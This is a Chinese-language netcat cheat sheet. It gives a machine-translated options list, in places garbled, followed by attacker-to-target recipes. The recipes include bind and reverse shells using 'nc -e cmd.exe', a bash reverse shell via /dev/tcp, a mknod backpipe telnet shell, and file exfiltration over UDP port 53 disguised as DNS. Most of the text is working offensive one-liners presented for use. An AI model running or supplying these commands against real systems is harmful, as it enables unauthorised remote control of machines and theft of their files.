连接到某处:nc [-options] hostname port[s] [ports] ...

侦听入站:nc -l -p port [-options] [hostname] [port]

options:

-d 分离形式控制台后台模式

-c,--close从标准输入的EOF密切联系

  -e,--exec = PROGRAM程序后,exec的连接

  -g,--gateway = LIST源路由跳点[S],多达8个

  -G,--pointer = NUM源路由指针:4,8,12,...

  -h,--help显示帮助并退出

  对于线发送-i,--interval = SECS延迟间隔,端口扫描

  -l,--listen监听模式,用于入站连接

  -L,--tunnel =地址:端口转发本地端口远程地址

  -n,--dont,解决纯数字IP地址,不DNS

  -o,--output = FILE输出hexdump都通信,以文件(-x暗示)

  -p,--local端口= NUM本地端口号

  -r,--randomize随机本地和远程端口

  -s,--source =地址本地源地址(IP或主机名)

  -t,--tcp TCP模式(默认)

  -T,使用Telnet协商--telnet回答

  -u,--udp UDP模式

  -v,--verbose冗长(使用两次,更详细)

  -V,--version输出版本信息并退出

  -x,--hexdump hexdump都传入和传出流量

  -w,--wait = SECS超时连接和最后读网

  -z,--zero零I / O模式(用于扫描)

***机建立服务器等目标机送CMD

***机:kali

nc -l -p 3333

 

目标机:XP

nc -d ***机IP -e -cmd.exe

 

 

 

目标机建立服务器等***机去联

目标机:

nc -d -l -p 3333 -e cmd.exe

 

***机:

nc 目标机IP 3333

 

 

netcat传文件(先要***机建立服务端收取)UDP53号端口是DNS

目标机:nc -u 192.168.1.105 53 < 123.txt


这里192.168.1.105是***机的

 

***机:

nc -u -l -p 53 > 456.txt

 

以及

目标机器:nc -v -w 30 -p 3333 -l < 123.txt(-w是延迟,超过30秒断开,-l进入监听)

***机器:nc -v -w 3 192.168.1.108 3333 > 456.txt(192.168.1.108为目标机)


linux建立服务送shellwindows

***机:nc -l -n -vv -p 8080

                

目标机器:/bin/bash -i > /dev/tcp/192.168.1.108/8080 0<&1 2>&1

                     mknod backpipe p && telnet 192.168.1.108 8080 0<backpipe | /bin/bash 1>backpipe